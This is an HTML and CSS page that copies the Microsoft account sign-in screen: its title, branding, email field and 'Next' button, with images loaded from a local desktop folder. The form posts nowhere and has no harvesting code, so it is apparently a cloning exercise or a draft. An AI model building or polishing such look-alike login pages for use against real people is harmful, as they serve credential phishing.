<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1.0"/>
	<title>Sign in to your Microsoft account</title>
	<style type="text/css">body{
            background-image: url('C:\Users\n.lakshmi\OneDrive - Insignia\Desktop\microsoft login\2_bc3d32a696895f78c19df6c717586a5d.jpg');
            background-repeat: no-repeat;
            background-size: cover;
        }
        #div1{
            margin-left: 600px;
            margin-top: 200px;
            width: 400px;
            background-color: #ffffff;
            padding-left: 24px;
            padding-top: 24px;
            padding-bottom: 24px;
      		font-family: "Segoe UI","Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
    color: #1b1b1b;
    text-align: left;
}
        }
        #img1{
            vertical-align: middle;
            width: 108px;
    		height: 24px;
      		font-weight: 400;
    		font-size: 1.9x;
    		line-height: 1.25rem;
        }
        #p1{
            font-size: 1.5rem;
            font-weight: 600;
            margin-top: 10px;
      font-family: "Segoe UI","Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
      line-height:1.75rem;
      color: #1b1b1b;
      text-align:left;
        }
        #textbox{
            border: 1px; solid #transparent;
            font-size:0.9375rem;
      		font-family: "Segoe UI","Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";;
            font-size: inherit;
border-color: rgba(0,0,0,0.6);
      outline: none;
    outline-color: initial;
    outline-style: none;
    outline-width: initial;
background-color: transparent;
    border-top-width: 0;
    border-left-width: 0;
    border-right-width: 0;
    padding-left: 0;
        }
        hr{
            width: 388px;
            margin-right: 100px;
            margin-bottom: 10px;
    width: 90%;
    background-image: none;
        }
        #label1{
            color: #1b1b1b;
            font-size: .8125rem;
            text-align: left;
            line-height: 1.25rem;
        }
        #a1{
            color: #0067b8;
            text-decoration: none;
            background-color: #transparent;
            font-size: .8125rem;
      		font-size: .8125rem;
            text-align: left;
            line-height: 1.25rem;
        }
        #a1:hover{
            text-decoration: underline;
            color: #666666;

        }
        #a2{
            color: #0067b8;
            text-decoration: none;
            background-color: #transparent;
            font-size: .8125rem;
      		font-size: .8125rem;
            text-align: left;
            line-height: 1.25rem;
            float: left;
            margin-right: 0px;
        }
        #a2:hover{
            text-decoration: underline;
            color: #666666;
        }
        #a3{
            float: left;
            margin-left: 10px;

        }
        #img2{
            vertical-align: middle;
            
        }
        input[type=submit] {
            width: 108px;
            background-color: #0067b8;
            color: white;
            font-size: 0.8652rem;
            padding: 7px;
            border: 1px solid #0067b8;
            margin-left: 260px;
            margin-top: 15px;
            opacity: 0.9;
            border-color: transparent;
            min-height: 32px;
            line-height: normal;
            text-align: center;
            vertical-align: middle;
            display: block;
      font-family: "Segoe UI","Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
        }
        input[type=submit]:hover{
            cursor: pointer;
            opacity: 1;
           background-color: #005da6;
  
        }
        #div2{
            margin-left: 600px;
margin-right:1000px;
            margin-top: 30px;
            width: 400px;
    padding-right: 13px;
    display: table;
    table-layout: fixed;
    padding-left: 12px;
            background-color: #ffffff;
            line-height: 16px;
      padding-top: 8px;
    padding-bottom: 8px;
    vertical-align: middle;
      		font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
    color: #1b1b1b;
    text-align: left;
        }
        #img3{
                width: 32px;
                height: 32px;
                position: relative;
                vertical-align: middle;
                line-height: 16px;
                direction: ltr;
                        }
        #label2{
width: 286px;
height: 16px;
            font-weight: 400;
    font-size: .9375rem;
     font-weight: 400;
    font-size: .9375rem;
           font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
    direction: ltr;
text-align: left;
margin-top: 25px;
        }
        #button1{
            background-color: #ffffff;
            border: 1px solid #ffffff;
            width: 368px;
 vertical-align: middle;

text-align: left;
    direction: ltr;
        }
        #button1:hover{
            cursor: pointer;
            background-color: #e5e5e5;
            border: 1px solid #e5e5e5;
        }
     .footer {
  position: fixed;
  left: 0;
  bottom: 0;
  width: 95%;
  background-color: none;
  text-align: right;
color: #747474;
text-decoration: none;
    margin: 0 24px!important;
    margin-top: 0px !important;
    margin-right: 24px !important;
    margin-bottom: 0px !important;
    margin-left: 24px !important;
font-weight: 400;
font-size: 12px;
    line-height: 28px;
    white-space: nowrap;
    display: inline-block;
    background-color: transparent;
    font-family: "Segoe UI Webfont",-apple-system,"Helvetica Neue","Lucida Grande","Roboto","Ebrima","Nirmala UI","Gadugi","Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI","Tunga","Lao UI","Raavi","Iskoola Pota","Latha","Leelawadee","Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math";
}
footer.sections a:hover {
    opacity:1.0;
text-decoration: underline;
color: #747474;
}
	</style>
</head>
<body>
<div id="div1"><img alt="" height="24" id="img1" src="C:\Users\n.lakshmi\OneDrive - Insignia\Desktop\microsoft login\microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd_51.png" width="108"/>
<p id="p1">Sign in</p>

<form action="" method="POST"><input id="textbox" name="email" placeholder="Email, phone, or Skype" required="" type="text"/>
<hr/> <label for="" id="label1">No account?</label> <a href="#" id="a1">Create one!</a><br/>
<br/>
<a href="#" id="a2">Can&#39;t access your account?</a><br/>
<br/>
<input name="submit" type="submit" value="Next"/> </form>
</div>

<div id="div2"><button id="button1"><img alt="" id="img3" src="C:\Users\n.lakshmi\OneDrive - Insignia\Desktop\microsoft login\signin-options_4e48046ce74f4b89d45037c90576bfac.jpg"/> <label for="" id="label2">Sign-in options</label></button></div>
<div3 class="footer"> <a href="#" style="color: #747474">Terms of use</a>     <a href="#" style="color: #747474">Privacy &amp; cookies</a></div3>

<p> </p>

<p> </p>


</body></html>
